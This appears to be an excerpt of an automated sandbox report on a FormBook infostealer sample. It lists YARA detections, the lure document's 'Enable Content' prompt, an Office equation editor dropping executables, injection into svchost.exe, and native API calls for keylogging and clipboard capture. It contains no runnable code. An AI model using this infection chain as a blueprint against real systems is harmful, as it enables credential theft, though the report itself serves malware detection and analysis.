          Source: C:\Users\Public\vbc.exeCode function: 4_2_0040548D GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,4_2_0040548D
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00C44632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,5_2_00C44632
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00C30508 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,5_2_00C30508

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000006.00000002.2204900441.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2204979251.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2169563317.0000000000220000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2380114742.00000000000B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2204962869.00000000003C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2380245950.0000000000210000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000001.2167976340.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2380085574.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.acqyswhf.exe.220000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.acqyswhf.exe.220000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.dtz25z5e9sr.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.1.dtz25z5e9sr.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.1.dtz25z5e9sr.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.dtz25z5e9sr.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000006.00000002.2204900441.00000000001F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.2204900441.00000000001F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.2204979251.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.2204979251.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2169563317.0000000000220000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2169563317.0000000000220000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.2380114742.00000000000B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.2380114742.00000000000B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.2204962869.00000000003C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.2204962869.00000000003C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.2380245950.0000000000210000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.2380245950.0000000000210000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000001.2167976340.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000001.2167976340.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.2380085574.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.2380085574.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.acqyswhf.exe.220000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.acqyswhf.exe.220000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.acqyswhf.exe.220000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.acqyswhf.exe.220000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.dtz25z5e9sr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.dtz25z5e9sr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.1.dtz25z5e9sr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.1.dtz25z5e9sr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.1.dtz25z5e9sr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.1.dtz25z5e9sr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.dtz25z5e9sr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.dtz25z5e9sr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
          Source: Screenshot number: 4Screenshot OCR: Enable Editing from the 19 h . yellow bar above ,0 This document is 3. Once you have enabled ed
          Source: Screenshot number: 4Screenshot OCR: Enable Content from the yellow bar above 22 23 24 25 26 27 28 0 29 . 30 31 32 33 34 3
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\scancopy87867678[1].exeJump to dropped file
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_004181D0 NtCreateFile,6_2_004181D0
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00418280 NtReadFile,6_2_00418280
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00418300 NtClose,6_2_00418300
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_004183B0 NtAllocateVirtualMemory,6_2_004183B0
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_004182FA NtClose,6_2_004182FA
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00418284 NtReadFile,6_2_00418284
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_004183AB NtAllocateVirtualMemory,6_2_004183AB
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BE00C4 NtCreateFile,LdrInitializeThunk,6_2_00BE00C4
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BE0078 NtResumeThread,LdrInitializeThunk,6_2_00BE0078
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BE0048 NtProtectVirtualMemory,LdrInitializeThunk,6_2_00BE0048
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BE07AC NtCreateMutant,LdrInitializeThunk,6_2_00BE07AC
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BDF9F0 NtClose,LdrInitializeThunk,6_2_00BDF9F0
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BDF900 NtReadFile,LdrInitializeThunk,6_2_00BDF900
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BDFAE8 NtQueryInformationProcess,LdrInitializeThunk,6_2_00BDFAE8
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BDFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_00BDFAD0
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BDFBB8 NtQueryInformationToken,LdrInitializeThunk,6_2_00BDFBB8
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BDFB68 NtFreeVirtualMemory,LdrInitializeThunk,6_2_00BDFB68
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BDFC90 NtUnmapViewOfSection,LdrInitializeThunk,6_2_00BDFC90
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BDFC60 NtMapViewOfSection,LdrInitializeThunk,6_2_00BDFC60
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BDFD8C NtDelayExecution,LdrInitializeThunk,6_2_00BDFD8C
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BDFDC0 NtQuerySystemInformation,LdrInitializeThunk,6_2_00BDFDC0
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BDFEA0 NtReadVirtualMemory,LdrInitializeThunk,6_2_00BDFEA0
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BDFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_00BDFED0
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BDFFB4 NtCreateSection,LdrInitializeThunk,6_2_00BDFFB4
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BE10D0 NtOpenProcessToken,6_2_00BE10D0
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BE0060 NtQuerySection,6_2_00BE0060
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BE01D4 NtSetValueKey,6_2_00BE01D4
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BE010C NtOpenDirectoryObject,6_2_00BE010C
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BE1148 NtOpenThread,6_2_00BE1148
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BDF8CC NtWaitForSingleObject,6_2_00BDF8CC
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BDF938 NtWriteFile,6_2_00BDF938
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BE1930 NtSetContextThread,6_2_00BE1930
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BDFAB8 NtQueryValueKey,6_2_00BDFAB8
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BDFA20 NtQueryInformationFile,6_2_00BDFA20
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BDFA50 NtEnumerateValueKey,6_2_00BDFA50
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BDFBE8 NtQueryVirtualMemory,6_2_00BDFBE8
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BDFB50 NtCreateKey,6_2_00BDFB50
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BDFC30 NtOpenProcess,6_2_00BDFC30
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BDFC48 NtSetInformationFile,6_2_00BDFC48
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BE0C40 NtGetContextThread,6_2_00BE0C40
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BE1D80 NtSuspendThread,6_2_00BE1D80
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BDFD5C NtEnumerateKey,6_2_00BDFD5C
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BDFE24 NtWriteVirtualMemory,6_2_00BDFE24
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BDFFFC NtCreateProcessEx,6_2_00BDFFFC
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BDFF34 NtQueueApcThread,6_2_00BDFF34
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_004181D0 NtCreateFile,6_1_004181D0
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_00418280 NtReadFile,6_1_00418280
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_00418300 NtClose,6_1_00418300
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_004183B0 NtAllocateVirtualMemory,6_1_004183B0
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_004182FA NtClose,6_1_004182FA
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_00418284 NtReadFile,6_1_00418284
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_004183AB NtAllocateVirtualMemory,6_1_004183AB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_008500C4 NtCreateFile,LdrInitializeThunk,10_2_008500C4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_008507AC NtCreateMutant,LdrInitializeThunk,10_2_008507AC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0084F9F0 NtClose,LdrInitializeThunk,10_2_0084F9F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0084F900 NtReadFile,LdrInitializeThunk,10_2_0084F900
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0084FAB8 NtQueryValueKey,LdrInitializeThunk,10_2_0084FAB8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0084FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,10_2_0084FAD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0084FAE8 NtQueryInformationProcess,LdrInitializeThunk,10_2_0084FAE8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0084FBB8 NtQueryInformationToken,LdrInitializeThunk,10_2_0084FBB8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0084FB50 NtCreateKey,LdrInitializeThunk,10_2_0084FB50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0084FB68 NtFreeVirtualMemory,LdrInitializeThunk,10_2_0084FB68
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0084FC60 NtMapViewOfSection,LdrInitializeThunk,10_2_0084FC60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0084FD8C NtDelayExecution,LdrInitializeThunk,10_2_0084FD8C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0084FDC0 NtQuerySystemInformation,LdrInitializeThunk,10_2_0084FDC0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0084FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,10_2_0084FED0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0084FFB4 NtCreateSection,LdrInitializeThunk,10_2_0084FFB4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_008510D0 NtOpenProcessToken,10_2_008510D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00850048 NtProtectVirtualMemory,10_2_00850048
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00850060 NtQuerySection,10_2_00850060
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00850078 NtResumeThread,10_2_00850078
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_008501D4 NtSetValueKey,10_2_008501D4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0085010C NtOpenDirectoryObject,10_2_0085010C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00851148 NtOpenThread,10_2_00851148
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0084F8CC NtWaitForSingleObject,10_2_0084F8CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00851930 NtSetContextThread,10_2_00851930
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0084F938 NtWriteFile,10_2_0084F938
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0084FA20 NtQueryInformationFile,10_2_0084FA20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0084FA50 NtEnumerateValueKey,10_2_0084FA50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0084FBE8 NtQueryVirtualMemory,10_2_0084FBE8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0084FC90 NtUnmapViewOfSection,10_2_0084FC90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0084FC30 NtOpenProcess,10_2_0084FC30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00850C40 NtGetContextThread,10_2_00850C40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0084FC48 NtSetInformationFile,10_2_0084FC48
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00851D80 NtSuspendThread,10_2_00851D80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0084FD5C NtEnumerateKey,10_2_0084FD5C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0084FEA0 NtReadVirtualMemory,10_2_0084FEA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0084FE24 NtWriteVirtualMemory,10_2_0084FE24
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0084FFFC NtCreateProcessEx,10_2_0084FFFC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0084FF34 NtQueueApcThread,10_2_0084FF34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_000981D0 NtCreateFile,10_2_000981D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00098280 NtReadFile,10_2_00098280
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00098300 NtClose,10_2_00098300
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_000983B0 NtAllocateVirtualMemory,10_2_000983B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00098284 NtReadFile,10_2_00098284
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_000982FA NtClose,10_2_000982FA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_000983AB NtAllocateVirtualMemory,10_2_000983AB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0078632E NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,10_2_0078632E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_007867C7 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,10_2_007867C7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00786332 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,10_2_00786332
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_007867C2 NtQueryInformationProcess,10_2_007867C2
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00C342D5: CreateFileW,DeviceIoControl,CloseHandle,5_2_00C342D5
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00403461 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_00403461
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004069254_2_00406925
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03C4E37C5_3_03C4E37C
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03C3133F5_3_03C3133F
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03C3F24C5_3_03C3F24C
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03C5322F5_3_03C5322F
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03CC01DD5_3_03CC01DD
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03C2D15B5_3_03C2D15B
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03C5113B5_3_03C5113B
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03C467DB5_3_03C467DB
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03C277535_3_03C27753
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03C227055_3_03C22705
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03CC16385_3_03CC1638
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03C3945A5_3_03C3945A
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03CA5B9A5_3_03CA5B9A
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03C2CBBC5_3_03C2CBBC
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03C2EAC15_3_03C2EAC1
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03C24A805_3_03C24A80
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03CC2A225_3_03CC2A22
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03C3C9F05_3_03C3C9F0
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03C318895_3_03C31889
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03CADFDA5_3_03CADFDA
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03C1FFD75_3_03C1FFD7
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03CCCFA45_3_03CCCFA4
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03C47F005_3_03C47F00
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03CD3E835_3_03CD3E83
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03C36DFE5_3_03C36DFE
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03CC0D8E5_3_03CC0D8E
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03C22DB25_3_03C22DB2
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03CA5D555_3_03CA5D55
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03CBFCEE5_3_03CBFCEE
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03C2CC5C5_3_03C2CC5C
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03C42C6D5_3_03C42C6D
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00BF33B75_2_00BF33B7
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00BD16635_2_00BD1663
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00BF23F55_2_00BF23F5
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00C584005_2_00C58400
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00C065025_2_00C06502
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00BDE6F05_2_00BDE6F0
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00C0265E5_2_00C0265E
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00BF282A5_2_00BF282A
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_3_03C2391F5_3_03C2391F
